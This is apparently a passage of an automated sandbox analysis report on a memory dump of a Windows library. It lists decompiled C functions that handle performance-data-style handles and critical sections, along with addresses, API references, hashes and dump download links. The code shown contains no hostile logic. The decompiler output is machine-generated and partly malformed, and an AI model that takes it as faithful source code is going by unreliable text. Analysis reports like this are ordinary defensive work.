							 *((intOrPtr*)(_v12 + 0x30)) =  *_t27;
							_t31 = (_v8 << 5) + 0x6ff8417c; // 0x21510500
							 *((intOrPtr*)(_v12 + 8)) =  *_t31;
							_t35 = (_v8 << 5) + 0x6ff84180; // 0xfffffffb
							 *((intOrPtr*)(_v12 + 0x14)) =  *_t35;
							_t96 = _v8 << 5;
							_t67 = _v12;
							_t39 = _t96 + 0x6ff84188; // 0x989680
							 *((intOrPtr*)(_t67 + 0x20)) =  *_t39;
							_t41 = _t96 + 0x6ff8418c; // 0x0
							 *((intOrPtr*)(_t67 + 0x24)) =  *_t41;
							 *((intOrPtr*)(_v12 + 0x1c)) =  *((intOrPtr*)(_v16 + 4));
							 *((intOrPtr*)(_v12 + 0x18)) = _a12;
							 *_a16 = _v12;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bb9;
					}
				}
			}













                0x6ff81299
                0x6ff812a4
                0x6ff812a8
                0x6ff812ba
                0x6ff812bf
                0x6ff812c6
                0x00000000
                0x6ff812d8
                0x6ff812dd
                0x6ff812e7
                0x6ff812f9
                0x00000000
                0x6ff81309
                0x6ff81309
                0x6ff8130c
                0x6ff81312
                0x6ff81324
                0x6ff81329
                0x6ff8132e
                0x6ff81334
                0x00000000
                0x00000000
                0x6ff81344
                0x6ff81344
                0x6ff8134b
                0x6ff81350
                0x6ff81355
                0x6ff81321
                0x00000000
                0x6ff81321
                0x6ff81360
                0x6ff81367
                0x6ff8140a
                0x00000000
                0x6ff81410
                0x6ff81373
                0x6ff81385
                0x6ff81391
                0x6ff81397
                0x6ff813a3
                0x6ff813a9
                0x6ff813b5
                0x6ff813bb
                0x6ff813c1
                0x6ff813c4
                0x6ff813c7
                0x6ff813cd
                0x6ff813d0
                0x6ff813d6
                0x6ff813e2
                0x6ff813eb
                0x6ff813f4
                0x6ff813fb
                0x00000000
                0x6ff81401
                0x6ff81421
                0x00000000
                0x6ff81427
                0x6ff812e7

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF812DD
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF812F9
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81421
                  • Part of subcall function 6FF82D50: wcschr.MSVCRT ref: 6FF82D87
                  • Part of subcall function 6FF82D50: wcschr.MSVCRT ref: 6FF82DCF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF813FB
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8140A
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$wcschr$Enter
                • String ID: %p %s %lx %p$0HDP$p-w
                • API String ID: 263007561-2707375437
                • Opcode ID: 030f71b02618c64b2b61af81ae5091bbe9d286762e2bef2dabd3cbac3f1bfbcc
                • Instruction ID: 1b9114f14fb820f9e7049a2ebd201caa4257898eb0dfbd7a5600abb1af13918d
                • Opcode Fuzzy Hash: 030f71b02618c64b2b61af81ae5091bbe9d286762e2bef2dabd3cbac3f1bfbcc
                • Instruction Fuzzy Hash: 76417AB4A00608EFDB04DF98D580A9EBBB5FF4A314F118299E8359B355D731EA80CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF818C0, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E6FF818C0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff80000("%p %x %p %p\n", _a4, _a8, _a12, _a16);
				if(_a16 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
							_push(_a16);
							_push(_v8 + 0x40);
							_push(_v8 + 0x38);
							_push(_a8);
							_v12 = E6FF82E80(_v8);
							if(_v12 == 0) {
								 *_a16 = 0;
								if(_a12 != 0) {
									 *_a12 =  *((intOrPtr*)(_v8 + 8));
								}
							}
							LeaveCriticalSection(0x6ff850ac);
							return _v12;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bc6;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff818c9
                0x6ff818e1
                0x6ff818ed
                0x6ff818fe
                0x6ff81908
                0x6ff8191a
                0x00000000
                0x6ff81927
                0x6ff8192e
                0x6ff81945
                0x6ff8194c
                0x6ff81953
                0x6ff81957
                0x6ff81964
                0x6ff8196b
                0x6ff81970
                0x6ff8197a
                0x6ff81985
                0x6ff81985
                0x6ff8197a
                0x6ff8198c
                0x00000000
                0x6ff81992
                0x6ff81935
                0x00000000
                0x6ff8193b
                0x6ff81908
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF818FE
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8191A
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %x %p %p$1HDP$p-w
                • API String ID: 3168844106-2712400308
                • Opcode ID: fdf1f510e15b4183584d26adb2e3007729692b69529440385da030728344b43a
                • Instruction ID: e08a3a759cfa96f015ff430fdf49c5bb0397abd7e6ad8b64fc818e5805665c9e
                • Opcode Fuzzy Hash: fdf1f510e15b4183584d26adb2e3007729692b69529440385da030728344b43a
                • Instruction Fuzzy Hash: 59213AB5601249EFDB00CF98D944BAE7BB5BF4A319F108249F8269B340D774AE50CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81570, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF81570(intOrPtr* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t18;
				intOrPtr _t19;
				signed int _t21;
				signed int* _t31;

				_v8 = _a4;
				0x6ff80000("%p %p\n", _a4, _a8);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0) {
						L4:
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					}
					_t18 = _v8;
					if( *_t18 == 0x50444830) {
						0x6ff80000(1);
						if(_t18 == 0) {
							_t19 = E6FF82EB0(_t18);
							0x6ff80000(2, _v8);
							_v16 = _t19;
							_t21 = E6FF81000( *((intOrPtr*)(_v12 + 0x2c)), 0x20, 0);
							_t31 = _a8;
							 *_t31 = _t21 |  *(_v12 + 0x28);
							_t31[1] = 0;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d5;
					}
					goto L4;
				}
				return 0xc0000bbd;
			}










                0x6ff8157a
                0x6ff8158a
                0x6ff81596
                0x6ff815a7
                0x6ff815b1
                0x6ff815be
                0x6ff815c3
                0x00000000
                0x6ff815c9
                0x6ff815b3
                0x6ff815bc
                0x6ff815d2
                0x6ff815dc
                0x6ff815f4
                0x6ff815fe
                0x6ff81606
                0x6ff81615
                0x6ff81624
                0x6ff81627
                0x6ff81629
                0x6ff81631
                0x00000000
                0x6ff81637
                0x6ff815e3
                0x00000000
                0x6ff815e9
                0x00000000
                0x6ff815bc
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF815A7
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF815C3
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$0HDP$p-w
                • API String ID: 3168844106-1388213855
                • Opcode ID: 385e9128b9c0d01ad50738c4d29d6e46be301be91b5c894471ccb04886c564e9
                • Instruction ID: 358ee884f5ff10d428371a1b62bba1d30437c1ab4e604d63c16654b23032d712
                • Opcode Fuzzy Hash: 385e9128b9c0d01ad50738c4d29d6e46be301be91b5c894471ccb04886c564e9
                • Instruction Fuzzy Hash: 2021A2B5A11108EFDB00DFA8D501B9E7BB4BF49314F148259F83ADB344EB71AA40CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81D50, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E6FF81D50(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a8 < 0xfffffff9 || _a8 > 7) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbd;
					} else {
						 *((intOrPtr*)(_v8 + 0x10)) = _a8;
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
			}




                0x6ff81d57
                0x6ff81d63
                0x6ff81d70
                0x6ff81d7a
                0x6ff81d8c
                0x00000000
                0x6ff81d99
                0x6ff81d9d
                0x6ff81daa
                0x00000000
                0x6ff81db7
                0x6ff81dbd
                0x6ff81dc5
                0x00000000
                0x6ff81dcb
                0x6ff81d9d

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D70
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D8C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81DAA
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81DC5
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: 9317352c0a7d5d4de00f25228884118ec56972fdd8cc1cd13bbef37dcd8f59fb
                • Instruction ID: 0e41a0490ce1e7b7ef196440c0db0a6fcf9247455de27b98c55010cb508b2a3d
                • Opcode Fuzzy Hash: 9317352c0a7d5d4de00f25228884118ec56972fdd8cc1cd13bbef37dcd8f59fb
                • Instruction Fuzzy Hash: 8F014B76511608EFCB04DF98C909BAD7BB4BF0A325F118255F8368A390E7719A40CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF819A0, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF819A0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				intOrPtr _t44;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t65;

				_v8 = _a4;
				0x6ff80000("%p %p %p\n", _a4, _a8, _a12, __ecx);
				if(_a12 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						 *_a12 =  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_a12 + 4)) =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_a12 + 8)) =  *((intOrPtr*)(_v8 + 0x2c));
						_t64 = _a12;
						_t44 = _v8;
						 *((intOrPtr*)(_t64 + 0x10)) =  *((intOrPtr*)(_t44 + 0x38));
						 *((intOrPtr*)(_t64 + 0x14)) =  *((intOrPtr*)(_t44 + 0x3c));
						_t58 = _a12;
						_t65 = _v8;
						 *((intOrPtr*)(_t58 + 0x18)) =  *((intOrPtr*)(_t65 + 0x40));
						 *((intOrPtr*)(_t58 + 0x1c)) =  *((intOrPtr*)(_t65 + 0x44));
						 *((intOrPtr*)(_a12 + 0x20)) = 1;
						if(_a8 != 0) {
							 *_a8 =  *((intOrPtr*)(_v8 + 8));
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}








                0x6ff819a7
                0x6ff819bb
                0x6ff819c7
                0x6ff819d8
                0x6ff819e2
                0x6ff819f4
                0x00000000
                0x6ff81a01
                0x6ff81a0a
                0x6ff81a15
                0x6ff81a21
                0x6ff81a24
                0x6ff81a27
                0x6ff81a2d
                0x6ff81a33
                0x6ff81a36
                0x6ff81a39
                0x6ff81a3f
                0x6ff81a45
                0x6ff81a4b
                0x6ff81a56
                0x6ff81a61
                0x6ff81a61
                0x6ff81a68
                0x00000000
                0x6ff81a6e
                0x6ff819e2
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF819D8
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF819F4
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p %p$1HDP$p-w
                • API String ID: 3168844106-1182936200
                • Opcode ID: 8779ea1f3386cd35943b920ee892a5cfe562accf4a78b67c981a174bd7388096
                • Instruction ID: bafff0fe1a5e13d61a0074f1e97af541ed4c88eea41878437512ca13e34a9e12
                • Opcode Fuzzy Hash: 8779ea1f3386cd35943b920ee892a5cfe562accf4a78b67c981a174bd7388096
                • Instruction Fuzzy Hash: 933194B8605249DFCB04CF58C580A9ABBB1FF49314F21869AEC298B351D771EE91CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81A80, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF81A80(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff80000("%p 0x%08x %p %p %p\n", _a4, _a8, _a12, _a16, _a20);
				if(_a20 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_push(_a20);
						_push(_a16 + 0x18);
						_push(_a12 + 0x18);
						_push(_a8);
						_v12 = E6FF82E80(_v8);
						LeaveCriticalSection(0x6ff850ac);
						return _v12;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff81a89
                0x6ff81aa5
                0x6ff81ab1
                0x6ff81abf
                0x6ff81ac9
                0x6ff81adb
                0x00000000
                0x6ff81ae8
                0x6ff81aeb
                0x6ff81af2
                0x6ff81af9
                0x6ff81afd
                0x6ff81b0a
                0x6ff81b12
                0x00000000
                0x6ff81b18
                0x6ff81ac9
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81ABF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81ADB
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p 0x%08x %p %p %p$1HDP$p-w
                • API String ID: 3168844106-3684456673
                • Opcode ID: 40563b7ef54df2a57334cd98b90d399a61d98345b451711807388f2cb7c96a28
                • Instruction ID: 8e7ac4945cc01ebde8e76ba8f4805465fa5d5ab7d2bbf9f337bba271c45fb254
                • Opcode Fuzzy Hash: 40563b7ef54df2a57334cd98b90d399a61d98345b451711807388f2cb7c96a28
                • Instruction Fuzzy Hash: A0112AB6A00209EFCB00DF9CD981E9E3BB9BF49315F108249F9259B351D730A960CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82A30, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF82A30(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				intOrPtr* _t21;
				intOrPtr _t23;

				_v8 = _a4;
				0x6ff80000("%p %p\n", _a4, _a8, __ecx);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_t21 = _a8;
						_t23 = _v8;
						 *_t21 =  *((intOrPtr*)(_t23 + 0x20));
						 *((intOrPtr*)(_t21 + 4)) =  *((intOrPtr*)(_t23 + 0x24));
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}






                0x6ff82a37
                0x6ff82a47
                0x6ff82a53
                0x6ff82a61
                0x6ff82a6b
                0x6ff82a7d
                0x00000000
                0x6ff82a8a
                0x6ff82a8a
                0x6ff82a8d
                0x6ff82a93
                0x6ff82a98
                0x6ff82aa0
                0x00000000
                0x6ff82aa6
                0x6ff82a6b
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A61
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A7D
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$1HDP$p-w
                • API String ID: 3168844106-2469439903
                • Opcode ID: 153bd987c5199ca854553bb16eb3b01ad093b73ffffcdaed60d36cd15477f3b7
                • Instruction ID: 7daca4c710bd2feb2f416a34e389d2a7746aac934a1a986fc0d86f17068c23df
                • Opcode Fuzzy Hash: 153bd987c5199ca854553bb16eb3b01ad093b73ffffcdaed60d36cd15477f3b7
                • Instruction Fuzzy Hash: 24012875611108EFCB00CF98D501B5D7BB5FF4A325F218195F8298B300D732AA41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF816E0, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF816E0(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					0x6ff80000(6);
					E6FF82C10(_v8);
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}




                0x6ff816e7
                0x6ff816f3
                0x6ff81700
                0x6ff8170a
                0x6ff8171c
                0x00000000
                0x6ff81729
                0x6ff8172b
                0x6ff81737
                0x6ff81744
                0x00000000
                0x6ff8174a

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81700
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8171C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81744
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: 0001071671235e8000d58f00252c42d68f63b21ff0a6be54bf63dbd18eff3b47
                • Instruction ID: adddebd697904a7128d75ab29998cae5d3527a1dd3a93d5417fd92b198163e40
                • Opcode Fuzzy Hash: 0001071671235e8000d58f00252c42d68f63b21ff0a6be54bf63dbd18eff3b47
                • Instruction Fuzzy Hash: 5BF0B4B6911208EFDB00DBD4D905B5E7BB8BF06325F214164F83597341E772AA50C692
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81760, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF81760(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					_push(_v8);
					E6FF82EB0(_v8);
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}




                0x6ff81767
                0x6ff81773
                0x6ff81780
                0x6ff8178a
                0x6ff8179c
                0x00000000
                0x6ff817a9
                0x6ff817ac
                0x6ff817ad
                0x6ff817ba
                0x00000000
                0x6ff817c0

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81780
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8179C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF817BA
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$0HDP$p-w
                • API String ID: 2978645861-675403308
                • Opcode ID: da8da111251ea0f39ddb65e0147ea113eb9f067b695bf7acd7e4908e3c2cb733
                • Instruction ID: c11102cef70b8846710209a50b22d6475f178ca8300329cf6fa1eadb272dca71
                • Opcode Fuzzy Hash: da8da111251ea0f39ddb65e0147ea113eb9f067b695bf7acd7e4908e3c2cb733
                • Instruction Fuzzy Hash: 56F082B5911108EFCB00DBD8D905A9E7BB8BF06325F204269F8359B340E7726A50CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82440, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E6FF82440(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr* _a16) {
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t58;
				void* _t60;

				_t31 = _a4;
				0x6ff80000(_t31, _a8, _a12, _a16);
				0x6ff80000("%s %d %p %p\n", _t31);
				_t60 = _t58 + 0x18;
				if(_a4 == 0) {
					if(_a12 == 0 || _a16 == 0) {
						return 0xc0000bbd;
					} else {
						if(_a8 != 0) {
							_v8 = 0;
							while(1) {
								0x6ff80000(0x6ff84170);
								_t60 = _t60 + 4;
								if(_v8 >= _t31) {
									break;
								}
								_t14 = (_v8 << 5) + 0x6ff84170; // 0x6
								_t31 =  *_t14;
								if(_t31 != _a8) {
									_v8 = _v8 + 1;
									continue;
								}
								_t17 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
								_v12 =  &((wcsrchr( *_t17, 0x5c))[0]);
								_v16 = lstrlenW(_v12) + 1;
								if( *_a16 >= _v16) {
									lstrcpyW(_a12, _v12);
									_v20 = 0;
								} else {
									_v20 = 0x800007d2;
								}
								 *_a16 = _v16;
								return _v20;
							}
							return 0xc0000bbd;
						}
						return 0;
					}
				}
				0x6ff80000("remote machine not supported\n");
				return 0x800007d0;
			}










                0x6ff82452
                0x6ff82456
                0x6ff82464
                0x6ff82469
                0x6ff82470
                0x6ff8248d
                0x00000000
                0x6ff8249f
                0x6ff824a3
                0x6ff824ac
                0x6ff824be
                0x6ff824c3
                0x6ff824c8
                0x6ff824ce
                0x00000000
                0x00000000
                0x6ff824d6
                0x6ff824d6
                0x6ff824df
                0x6ff824bb
                0x00000000
                0x6ff824bb
                0x6ff824e9
                0x6ff824fc
                0x6ff8250c
                0x6ff82517
                0x6ff8252a
                0x6ff82530
                0x6ff82519
                0x6ff82519
                0x6ff82519
                0x6ff8253d
                0x00000000
                0x6ff8253f
                0x00000000
                0x6ff82549
                0x00000000
                0x6ff824a5
                0x6ff8248d
                0x6ff82477
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %s %d %p %p$remote machine not supported
                • API String ID: 0-1546047983
                • Opcode ID: b90bcf01522cfceac5853696da31d3b4955c124b7a27fcfe097ebeccdb004bed
                • Instruction ID: 79de6144bbd7d9396980f8bb188bf570c4fa22701763dfa9cd94d90fb42b0fa8
                • Opcode Fuzzy Hash: b90bcf01522cfceac5853696da31d3b4955c124b7a27fcfe097ebeccdb004bed
                • Instruction Fuzzy Hash: 7A315CB1A44208EFDB00CF98D984B9E77B4FF45308F508559E835AB345D376BA50CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF8101F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF8101F(intOrPtr _a8) {
				intOrPtr _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				signed int _t8;
				intOrPtr* _t10;
				signed int _t12;
				intOrPtr* _t14;
				intOrPtr* _t19;
				void* _t22;

				_t3 = _a8;
				if(_t3 != 0) {
					L3:
					_t10 = __imp___adjust_fdiv; // 0x75e56be4
					 *0x6ff86974 =  *_t10;
					if(_t3 != 1) {
						if(_t3 != 0) {
							L15:
							_t4 = 1;
							return _t4;
						}
						_t5 =  *0x6ff8697c; // 0x0
						if(_t5 == 0) {
							goto L15;
						}
						_t12 =  *0x6ff86978; // 0x516500
						_t2 = _t12 - 4; // 0x5164fc
						_t19 = _t2;
						while(_t19 >= _t5) {
							_t14 =  *_t19;
							if(_t14 != 0) {
								 *_t14();
								_t5 =  *0x6ff8697c; // 0x0
							}
							_t19 = _t19 - 4;
						}
						free(_t5);
						 *0x6ff8697c =  *0x6ff8697c & 0x00000000;
						goto L15;
					}
					_t7 = malloc(0x80);
					 *0x6ff8697c = _t7;
					if(_t7 != 0) {
						 *_t7 =  *_t7 & 0x00000000;
						_t8 =  *0x6ff8697c; // 0x0
						_push(0x6ff85004);
						_push(0x6ff85000);
						 *0x6ff86978 = _t8;
						L6FF8341C();
						 *0x6ff86970 =  *0x6ff86970 + 1;
						goto L15;
					}
					L5:
					return 0;
				}
				_t22 =  *0x6ff86970 - _t3; // 0x0
				if(_t22 <= 0) {
					goto L5;
				}
				 *0x6ff86970 =  *0x6ff86970 - 1;
				goto L3;
